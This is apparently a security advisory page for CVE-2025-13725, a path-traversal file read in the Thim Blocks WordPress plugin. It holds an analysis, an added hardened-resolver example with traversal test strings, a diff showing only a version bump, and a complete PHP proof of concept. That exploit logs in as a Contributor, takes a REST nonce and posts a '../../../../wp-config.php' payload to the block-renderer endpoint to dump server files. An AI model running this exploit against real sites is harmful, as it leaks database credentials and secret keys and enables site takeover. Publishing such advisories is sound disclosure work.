Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13725: Gutenberg Thim Blocks <= 1.0.1 – Authenticated (Contributor+) Arbitrary File Read via 'iconSVG' Parameter (thim-blocks)

Plugin: thim-blocks
Severity: Medium (CVSS 6.5)
CWE: CWE-22
Vulnerable Version: 1.0.1
Patched Version: 1.0.2
Disclosed: January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13725:
The Gutenberg Thim Blocks plugin for WordPress, versions up to and including 1.0.1, contains an authenticated arbitrary file read vulnerability. The flaw resides in the server-side rendering logic for the ‘thim-blocks/icon’ block. Attackers with Contributor-level access or higher can exploit this to read sensitive server files.

Atomic Edge research identifies the root cause as insufficient path validation within the server-side rendering function that processes the ‘iconSVG’ block attribute. The vulnerable code accepts user-supplied input for the ‘iconSVG’ parameter and uses it to construct a file path for reading. The plugin fails to validate or sanitize this input, allowing directory traversal sequences. The vulnerability manifests in the `render_block_thim_blocks_icon` function, which is registered via `register_block_type`.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker crafts a POST request to the WordPress REST API endpoint for block rendering, typically `/wp-json/wp/v2/block-renderer/thim-blocks/icon`. The request includes a malicious `attributes` JSON object containing an `iconSVG` parameter with a directory traversal payload, such as `../../../../wp-config.php`. The server-side renderer processes this attribute, reads the targeted file, and returns its contents within the block’s HTML response.

The visible diff changes only the plugin header of `thim-blocks.php`: it bumps the version number from 1.0.1 to 1.0.2 and drops a duplicated `Plugin URI` line. The Atomic Edge assessment indicates the fix likely involves adding proper path validation or sanitization within the `render_block_thim_blocks_icon` function; that change is not shown in the diff. The patched version should restrict the `iconSVG` parameter to safe, expected values, preventing traversal outside designated directories such as the plugin's own SVG icon assets.
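The following is an added example, not code from the Thim Blocks plugin or from Atomic Edge: it shows the unsafe "join the attribute onto a directory and read it" pattern the analysis describes next to a hardened resolver of the kind the patched version should contain. The function names, the `$icon_dir` layout, the sample icon and the `secret.txt` sibling file are all constructed for this illustration; the only real API referenced is `register_block_type()`, which is mentioned in a comment and not called so the script runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. Names, directory layout and sample
// files are assumptions made for the illustration.

// Unsafe pattern (reconstructed, not the plugin's actual source): the block
// attribute is concatenated onto a directory and read, so '../' walks out.
function example_unsafe_icon_svg(string $icon_dir, array $attributes): string {
    $svg = @file_get_contents($icon_dir . '/' . ($attributes['iconSVG'] ?? ''));
    return $svg === false ? '' : $svg;
}

// Hardened resolver: returns the absolute path of an allowlisted icon inside
// $icon_dir, or null when the attribute must be rejected.
function example_resolve_icon_path(string $icon_dir, $icon_svg): ?string {
    if (!is_string($icon_svg)) {
        return null;
    }
    // Accept only a bare icon name: letters, digits, dash, underscore.
    // '/', '\', '.' and NUL cannot pass, so '..' and absolute paths are out.
    // \A and \z (not ^/$) so a trailing newline cannot slip through.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $icon_svg)) {
        return null;
    }
    $base = realpath($icon_dir);
    $candidate = realpath($icon_dir . DIRECTORY_SEPARATOR . $icon_svg . '.svg');
    if ($base === false || $candidate === false) {
        return null; // directory or icon does not exist
    }
    // Containment check: after symlink resolution the file must still sit under $base.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Shape of a render callback as register_block_type('thim-blocks/icon',
// ['render_callback' => ...]) would invoke it; plain PHP here so it runs alone.
function example_render_icon(string $icon_dir, array $attributes): string {
    $path = example_resolve_icon_path($icon_dir, $attributes['iconSVG'] ?? null);
    if ($path === null) {
        return '<span class="thim-icon thim-icon-missing"></span>';
    }
    return '<span class="thim-icon">' . file_get_contents($path) . '</span>';
}

// --- self-check against a constructed icon directory ----------------------
$dir = sys_get_temp_dir() . '/icon-example-' . getmypid();
mkdir($dir . '/svg', 0700, true);
file_put_contents($dir . '/svg/arrow-right.svg', '<svg><path d="M0 0h8"/></svg>');
file_put_contents($dir . '/secret.txt', 'DB_PASSWORD=example'); // sibling of svg/, must stay unreadable

$cases = [
    'arrow-right',            // legitimate icon name
    '../secret.txt',          // traversal one level up
    '../../../../etc/passwd', // deeper traversal
    '/etc/passwd',            // absolute path
    "arrow-right\0.txt",      // NUL byte
    'arrow-right.svg',        // dot in name: rejected, the extension is added server-side
];
foreach ($cases as $case) {
    $resolved = example_resolve_icon_path($dir . '/svg', $case);
    printf("%-28s -> %s\n", json_encode($case),
        $resolved === null ? 'rejected' : 'ok: ' . basename($resolved));
}
echo example_render_icon($dir . '/svg', ['iconSVG' => 'arrow-right']), "\n";
// Contrast: the unsafe pattern returns the sibling file for the same traversal input.
printf("unsafe '../secret.txt' -> %s\n",
    example_unsafe_icon_svg($dir . '/svg', ['iconSVG' => '../secret.txt']));

// cleanup of the constructed files
unlink($dir . '/svg/arrow-right.svg');
unlink($dir . '/secret.txt');
rmdir($dir . '/svg');
rmdir($dir);
```

Two layers are deliberate: the allowlist regex rejects every traversal form before any filesystem call (which also keeps NUL bytes away from `realpath()`, which refuses them in PHP 8), and the `realpath()` containment check catches anything that gets past an allowlist, such as a symlinked icon pointing outside the directory. Either alone is weaker than both together.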

Successful exploitation discloses any file readable by the web server process. Attackers can read the WordPress configuration file (`wp-config.php`), which contains database credentials and secret keys. They can also read other sensitive files such as `/etc/passwd`, application source code, or environment files. This data exposure can facilitate complete site compromise, including database access and potential remote code execution.

Differential between vulnerable and patched code

Code Diff
--- a/thim-blocks/thim-blocks.php
+++ b/thim-blocks/thim-blocks.php
@@ -2,13 +2,12 @@
 /**
  * Plugin Name:       Thim Blocks
  * Description:       Gutenberg blocks library to create WordPress sites in the Gutenberg Block Editor
- * Version:           1.0.1
+ * Version:           1.0.2
  * Plugin URI:        https://thimpress.com/thim-blocks
  * Requires at least: 6.7
  * Requires PHP:      7.4
  * Author:            ThimPress
  * Author URI:        https://thimpress.com
- * Plugin URI:        https://thimpress.com/thim-blocks
  * License:           GPL-2.0-or-later
  * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain:       thim-blocks
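Review bot: this hunk contains no functional change, only the `Version` header bump from 1.0.1 to 1.0.2 and the removal of a duplicated `Plugin URI` line, so it cannot by itself confirm that the `iconSVG` traversal in `render_block_thim_blocks_icon` was fixed; the analysis above correctly hedges with "likely involves", but the diff should be extended to the block's render callback so the added validation (restricting `iconSVG` to an allowlisted icon name and checking that the resolved path stays inside the plugin's SVG directory) is visible to reviewers. The hunk header counts (`-2,13 +2,12`) are consistent with the two removals and one addition shown.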

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13725 - Gutenberg Thim Blocks <= 1.0.1 - Authenticated (Contributor+) Arbitrary File Read via 'iconSVG' Parameter

$target_url = 'http://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - Contributor or higher account
$password = 'contributor_password'; // CHANGE THIS
$file_to_read = '../../../../wp-config.php'; // Target file path

// Step 1: Authenticate and obtain a WordPress REST API nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);

// Step 2: Extract the REST API nonce from the admin page
curl_setopt_array($ch, [
    CURLOPT_URL => $admin_url,
    CURLOPT_POST => false,
    CURLOPT_POSTFIELDS => null
]);
$admin_page = curl_exec($ch);

preg_match('/"rest_nonce":"([a-f0-9]+)"/', $admin_page, $matches);
if (empty($matches[1])) {
    die('[-] Failed to obtain REST API nonce. Authentication may have failed.');
}
$rest_nonce = $matches[1];

// Step 3: Exploit the vulnerability via the block renderer endpoint
$api_url = $target_url . '/wp-json/wp/v2/block-renderer/thim-blocks/icon';
$payload = json_encode([
    'attributes' => [
        'iconSVG' => $file_to_read
    ]
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $api_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $payload,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'X-WP-Nonce: ' . $rest_nonce
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Parse and display the response
if ($http_code === 200) {
    $data = json_decode($response, true);
    if (isset($data['rendered'])) {
        echo "[+] File read successful. Contents:\n";
        echo htmlspecialchars($data['rendered']) . "\n";
    } else {
        echo "[-] Unexpected API response:\n";
        print_r($data);
    }
} else {
    echo '[-] Exploit failed. HTTP Code: ' . $http_code . "\n";
    echo 'Response: ' . $response . "\n";
}

// Cleanup
@unlink('cookies.txt');

?>
